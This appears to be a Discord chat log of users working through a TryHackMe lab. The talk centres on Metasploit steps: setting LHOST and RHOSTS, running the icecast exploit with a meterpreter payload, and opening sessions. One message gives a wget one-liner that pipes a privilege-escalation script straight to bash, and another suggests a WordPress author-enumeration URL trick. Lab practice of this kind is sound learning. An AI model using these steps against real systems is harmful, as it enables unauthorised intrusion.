candid carbon
#

So set LHOST than the ip on tryhackme?

ashen prism
#

No it's not the ip of the tryhackme room , LHOST IP is usually checked through ifconfig then look for tun0 that's your LHOST IP

#

Then set it to LHOST <tun0 IP>

#

Yup that's the IP

candid carbon
#

👍

ashen prism
#

Now RHOSTS is the IP of tryhackme room

candid carbon
#

Fairly simple.

ashen prism
#

type show options maybe you miss something

#

It seems right then why no sessions is being created

#

Ohhh

#

It's running in background

#

type sessions

candid carbon
#

xD

ashen prism
#

Dang 😦

#

Have you selected the windows/meterperter payload ?

compact scaffold
supple trellis
#

wget https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh -O - |bash

ashen prism
#

Yup it's selected then why

#

Go though the questions again to see if you not miss anything?

candid carbon
#

Ok

#

@ashen prism Is It use 5 or use #

ashen prism
#

Try from set payload to windows/meterperter

#

No that 5 or # isn't related in this scenario

candid carbon
#

@ashen prism I'll be back in a sec

ashen prism
#

Ok

plucky vault
#

later

ashen prism
#

It's 10.9.something your LHOST

#

10.9.90.163 this is LHOST I think you might have wrote broadcast address

#

@candid carbon 10.9.90.163 this is LHOST

#

Yes

#

Now set RHOSTS

#

use icecast

#

GG got'em xD

#

No wait , check sessions

#

Yeah it was hard for me too xD

#

Ok good , now sessions -i 1 or 0

#

now run jobs

#

Man whyyyyy

candid carbon
#

Gotta wait

ashen prism
#

😦

candid carbon
#

Why what?

ashen prism
#

Idk why the command didn't worked xD

#

Try again to run it again with run -j then type jobs

candid carbon
#

YEAHHHHHHHHHHHHHHHHHHHHHHHHHHH

#

Not YEAH

ashen prism
#

Now sessions -i 0 ?

#

Yeah msf is hard I'm so bad with windows machines xD

#

sessions to check available sessions

candid carbon
#

ITS LINUX

ashen prism
#

No I'm talking about the target machine which is windows xD

candid carbon
#

OH

ashen prism
#

Man it's making me crazy and I'm not even doing it xD

#

Again start from the scratch xD

#

set LHOST 10.9.90.163

austere viper
candid carbon
#

I should punch the monitor like summitg

ashen prism
#

hahahah

#

Yeah I feel you XD

#

Type sessions this time only type sessions not anything after it xD

#

yeah xDDDD

#

sessions -i 2

#

sessions -i 3

#

You got it

#

your in the machine

supple trellis
#

just append ?author=1 at the end of url @muted dirge

ashen prism
#

syntax error

#

You wrote sesions it's sessions

#

Ok now go over to the next section

#

For the tasks

#

The one you used use icecast that's the exploit and the set payload windows/meterpreter... that's the payload

plucky vault
#

yeah, there's IDs

steady relic
#

what machines are you making?

compact scaffold
ashen prism
#

I think that session got closed

#

Try to interact with it again

candid carbon
#

Which one?